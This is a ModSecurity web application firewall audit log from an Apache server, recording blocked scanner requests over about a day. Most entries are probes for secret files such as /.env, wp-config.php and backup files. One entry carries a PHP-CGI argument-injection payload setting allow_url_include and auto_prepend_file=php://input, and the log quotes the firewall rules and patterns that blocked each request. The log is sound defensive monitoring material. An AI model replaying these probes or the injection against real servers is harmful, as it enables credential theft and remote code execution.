Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744803552126946 1973 (- - -)
Stopwatch2: 1744803552126946 1973; combined=827, p1=384, p2=414, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a271fc58-Z--
--ec251a2c-A--
[16/Apr/2025:18:39:15 +0700] Z_-W4xk9XPLR9cFiTEvLXgAAAAs 103.236.140.4 53330 103.236.140.4 8181
--ec251a2c-B--
GET /crm/.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.151
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.151
X-Forwarded-Proto: https
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
--ec251a2c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ec251a2c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744803555349470 617 (- - -)
Stopwatch2: 1744803555349470 617; combined=252, p1=218, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ec251a2c-Z--
--324de545-A--
[16/Apr/2025:19:52:10 +0700] Z_-n-pVnVduWmh0dMDMoeQAAAJA 103.236.140.4 51388 103.236.140.4 8181
--324de545-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 206.81.12.187
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 206.81.12.187
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--324de545-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--324de545-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744807930865097 659 (- - -)
Stopwatch2: 1744807930865097 659; combined=246, p1=213, p2=0, p3=0, p4=0, p5=33, sr=54, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--324de545-Z--
--6a06bd02-A--
[16/Apr/2025:20:12:16 +0700] Z_-ssJVnVduWmh0dMDNCMQAAAIw 103.236.140.4 46732 103.236.140.4 8181
--6a06bd02-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 172.191.97.121
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 172.191.97.121
X-Forwarded-Proto: https
Connection: close
Accept: */*
User-Agent: python-httpx/0.28.1
--6a06bd02-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6a06bd02-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744809136339487 731 (- - -)
Stopwatch2: 1744809136339487 731; combined=310, p1=270, p2=0, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6a06bd02-Z--
--c01d0479-A--
[16/Apr/2025:20:25:41 +0700] Z_-v1Spe92T0H9-Aa0wBagAAAEY 103.236.140.4 47348 103.236.140.4 8181
--c01d0479-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 165.227.173.41
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 165.227.173.41
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--c01d0479-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c01d0479-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744809941883798 710 (- - -)
Stopwatch2: 1744809941883798 710; combined=285, p1=233, p2=0, p3=0, p4=0, p5=52, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c01d0479-Z--
--b364423e-A--
[16/Apr/2025:21:48:21 +0700] Z__DNSpe92T0H9-Aa0xWgwAAAEI 103.236.140.4 53472 103.236.140.4 8181
--b364423e-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 164.90.228.79
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 164.90.228.79
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--b364423e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b364423e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744814901489327 799 (- - -)
Stopwatch2: 1744814901489327 799; combined=316, p1=273, p2=0, p3=0, p4=0, p5=43, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b364423e-Z--
--d354e362-A--
[16/Apr/2025:22:36:26 +0700] Z__Oehk9XPLR9cFiTEuJeAAAABE 103.236.140.4 38352 103.236.140.4 8181
--d354e362-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.63.18
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.63.18
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--d354e362-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d354e362-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744817786097864 950 (- - -)
Stopwatch2: 1744817786097864 950; combined=435, p1=395, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d354e362-Z--
--a298c636-A--
[16/Apr/2025:22:53:12 +0700] Z__SaJVnVduWmh0dMDPJEQAAAJE 103.236.140.4 46104 103.236.140.4 8181
--a298c636-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-AL00 Build/HUAWEICLT-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/9069 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN
Accept-Charset: utf-8
--a298c636-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a298c636-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744818792511012 695 (- - -)
Stopwatch2: 1744818792511012 695; combined=311, p1=270, p2=0, p3=0, p4=0, p5=41, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a298c636-Z--
--9356a67f-A--
[17/Apr/2025:00:19:22 +0700] Z__mmipe92T0H9-Aa0yoZAAAAFc 103.236.140.4 43676 103.236.140.4 8181
--9356a67f-B--
GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.233.255.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.233.255.197
X-Forwarded-Proto: http
Connection: close
--9356a67f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9356a67f-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744823962313878 2177 (- - -)
Stopwatch2: 1744823962313878 2177; combined=792, p1=360, p2=405, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9356a67f-Z--
--6434d975-A--
[17/Apr/2025:00:19:35 +0700] Z__mpxk9XPLR9cFiTEvCQwAAAAA 103.236.140.4 44058 103.236.140.4 8181
--6434d975-B--
GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
Host: ns1.dwitekno.co.id
X-Real-IP: 103.233.255.197
X-Forwarded-Host: ns1.dwitekno.co.id
X-Forwarded-Server: ns1.dwitekno.co.id
X-Forwarded-For: 103.233.255.197
X-Forwarded-Proto: https
Connection: close
--6434d975-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6434d975-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||ns1.dwitekno.co.id|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744823975668803 2481 (- - -)
Stopwatch2: 1744823975668803 2481; combined=897, p1=449, p2=415, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6434d975-Z--
--b8ebf215-A--
[17/Apr/2025:01:01:10 +0700] Z__wZhk9XPLR9cFiTEvYzAAAABQ 103.236.140.4 33338 103.236.140.4 8181
--b8ebf215-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 124.115.231.142
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 124.115.231.142
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--b8ebf215-C--
--b8ebf215-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b8ebf215-E--
--b8ebf215-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744826470070101 7207 (- - -)
Stopwatch2: 1744826470070101 7207; combined=5690, p1=517, p2=5148, p3=0, p4=0, p5=25, sr=123, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b8ebf215-Z--
--e2acdf73-A--
[17/Apr/2025:03:25:48 +0700] aAASTBk9XPLR9cFiTEs5DgAAAAg 103.236.140.4 43068 103.236.140.4 8181
--e2acdf73-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.114.105.139
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.114.105.139
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--e2acdf73-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e2acdf73-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744835148214064 644 (- - -)
Stopwatch2: 1744835148214064 644; combined=275, p1=240, p2=0, p3=0, p4=0, p5=34, sr=61, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e2acdf73-Z--
--37925f49-A--
[17/Apr/2025:03:25:53 +0700] aAASUSpe92T0H9-Aa0wbPQAAAFM 103.236.140.4 43252 103.236.140.4 8181
--37925f49-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.114.105.139
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.114.105.139
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--37925f49-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--37925f49-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744835153745849 531 (- - -)
Stopwatch2: 1744835153745849 531; combined=209, p1=180, p2=0, p3=0, p4=0, p5=29, sr=48, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--37925f49-Z--
--14a1a047-A--
[17/Apr/2025:04:02:07 +0700] aAAazydHtgGT4CGaO0h8RQAAAFc 103.236.140.4 48982 103.236.140.4 8181
--14a1a047-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 159.89.103.20
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
Accept: */*
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force
Cookie:
X-Forwarded-For: 159.89.103.20
Accept-Encoding: gzip
X-Varnish: 125781277
--14a1a047-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--14a1a047-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744837327026680 773 (- - -)
Stopwatch2: 1744837327026680 773; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--14a1a047-Z--
--fb93797c-A--
[17/Apr/2025:04:55:21 +0700] aAAnSSdHtgGT4CGaO0h9DwAAAEE 103.236.140.4 49934 103.236.140.4 8181
--fb93797c-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 142.93.0.66
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 142.93.0.66
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--fb93797c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fb93797c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744840521380497 685 (- - -)
Stopwatch2: 1744840521380497 685; combined=255, p1=219, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fb93797c-Z--
--a62d2f34-A--
[17/Apr/2025:05:42:47 +0700] aAAyZydHtgGT4CGaO0h9SAAAAFU 103.236.140.4 50148 103.236.140.4 8181
--a62d2f34-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 128.199.206.102
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 128.199.206.102
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--a62d2f34-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a62d2f34-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744843367133890 806 (- - -)
Stopwatch2: 1744843367133890 806; combined=325, p1=282, p2=0, p3=0, p4=0, p5=42, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a62d2f34-Z--
--036c273a-A--
[17/Apr/2025:07:19:10 +0700] aABI_j2cuLCXMl1vWbD33QAAABM 103.236.140.4 50558 103.236.140.4 8181
--036c273a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.69.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.69.197
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/4G Language/zh_CN
Accept-Charset: utf-8
--036c273a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--036c273a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744849150293409 878 (- - -)
Stopwatch2: 1744849150293409 878; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--036c273a-Z--
--9e64b00b-A--
[17/Apr/2025:07:19:43 +0700] aABJHydHtgGT4CGaO0h9mQAAAEg 103.236.140.4 50560 103.236.140.4 8181
--9e64b00b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.69.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.69.197
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3872.0 Safari/537.36 Edg/78.0.244.0
Accept-Charset: utf-8
--9e64b00b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9e64b00b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744849183423779 852 (- - -)
Stopwatch2: 1744849183423779 852; combined=340, p1=298, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9e64b00b-Z--
--1238ac39-A--
[17/Apr/2025:07:39:11 +0700] aABNrydHtgGT4CGaO0h-BQAAAFU 103.236.140.4 52640 103.236.140.4 8181
--1238ac39-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Download Demon/3.5.0.11
Accept-Charset: utf-8
--1238ac39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1238ac39-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744850351532848 750 (- - -)
Stopwatch2: 1744850351532848 750; combined=306, p1=273, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1238ac39-Z--
--fb2b6d6e-A--
[17/Apr/2025:08:24:38 +0700] aABYVidHtgGT4CGaO0h-zgAAAFc 103.236.140.4 56910 103.236.140.4 8181
--fb2b6d6e-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--fb2b6d6e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fb2b6d6e-H--
